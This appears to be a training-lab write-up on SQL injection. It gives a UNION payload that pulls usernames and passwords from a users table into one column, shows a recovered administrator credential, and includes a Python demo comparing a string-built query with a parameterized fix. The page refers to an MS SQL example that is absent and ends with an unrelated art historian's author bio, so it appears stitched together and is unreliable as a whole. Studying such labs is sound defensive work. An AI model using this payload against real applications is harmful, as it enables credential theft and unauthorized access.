LAB 6: SQL injection UNION attack, retrieving multiple values in a single column

Problem Statement:

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution:

  1. In order to solve this lab, I first have to figure out how I can retrieve data from other tables into a single column (the heading says retrieving multiple values in a single column).

Administrator

3kg6bba8ibuwhhz0xc0m

The URL was crafted as:

' UNION SELECT NULL, CONCAT (Username, password) FROM users--

This then returned all the data from both tables in a single column.

Here we can see the same example in an MS SQL database, where CONCAT also takes care of joining a string with an integer.
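To see why the category filter behaves this way and what closes the hole, here is an added example (not part of the original post or the lab's own code) that runs the payload above against a string-built query and against a parameterized one. The schema, sample rows and function names are constructed for illustration, and SQLite stands in for the lab's database with a CONCAT function registered by hand.

```python
import sqlite3

# The payload exactly as it appears in the post.
PAYLOAD = "' UNION SELECT NULL, CONCAT (Username, password) FROM users--"


def make_db():
    """Constructed in-memory stand-in for the lab's tables (sample data only)."""
    db = sqlite3.connect(":memory:")
    # Older SQLite builds have no CONCAT, so register one that joins
    # arguments of any type (assumption made for this demo only).
    db.create_function("CONCAT", -1, lambda *a: "".join(str(x) for x in a))
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Mug', 'Ceramic mug', 'Gifts');
        INSERT INTO users VALUES ('administrator', 'sample-pw-1');
        INSERT INTO users VALUES ('alice', 'sample-pw-2');
    """)
    return db


def filter_vulnerable(db, category):
    # The input is spliced into the SQL text, so a quote in it ends the
    # string literal and the rest of the input is parsed as SQL.
    sql = ("SELECT name, description FROM products "
           "WHERE category = '" + category + "'")
    return db.execute(sql).fetchall()


def filter_parameterized(db, category):
    # The input is bound as a value and is only ever compared to the column.
    sql = "SELECT name, description FROM products WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("string-built :", filter_vulnerable(db, PAYLOAD))
    print("parameterized:", filter_parameterized(db, PAYLOAD))
```

With the bound parameter the whole input is treated as a category name that matches no product, so the query returns no rows.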


About the author

Sophia Bennett is an art historian and freelance writer with a passion for exploring the intersections between nature, symbolism, and artistic expression. With a background in Renaissance and modern art, Sophia enjoys uncovering the hidden meanings behind iconic works and sharing her insights with art lovers of all levels. When she’s not visiting museums or researching the latest trends in contemporary art, you can find her hiking in the countryside, always chasing the next rainbow.